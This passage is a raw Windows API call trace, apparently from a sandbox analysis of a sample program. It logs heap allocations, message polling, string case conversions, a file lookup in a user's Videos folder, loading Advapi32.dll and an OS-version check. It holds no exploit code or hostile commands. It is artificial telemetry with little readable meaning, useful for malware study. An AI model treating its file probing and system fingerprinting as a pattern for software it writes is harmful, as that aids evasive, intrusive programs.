(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0258.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.176] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.178] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/eJwCkaX.avi", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc3c900, ftCreationTime.dwHighDateTime=0x1d4c659, ftLastAccessTime.dwLowDateTime=0xba2bc700, ftLastAccessTime.dwHighDateTime=0x1d4d15a, ftLastWriteTime.dwLowDateTime=0xba2bc700, ftLastWriteTime.dwHighDateTime=0x1d4d15a, nFileSizeHigh=0x0, nFileSizeLow=0x13bd9, dwReserved0=0x170530, dwReserved1=0x11064, cFileName="eJwCkaX.avi", cAlternateFileName="")) returned 0xaa5820 [0258.179] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.187] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.187] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.187] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.188] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.188] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.188] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.189] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.189] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.190] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.190] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.191] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.191] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.191] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.191] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.191] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.192] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.193] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.193] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.193] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.194] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.194] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.194] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.194] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, 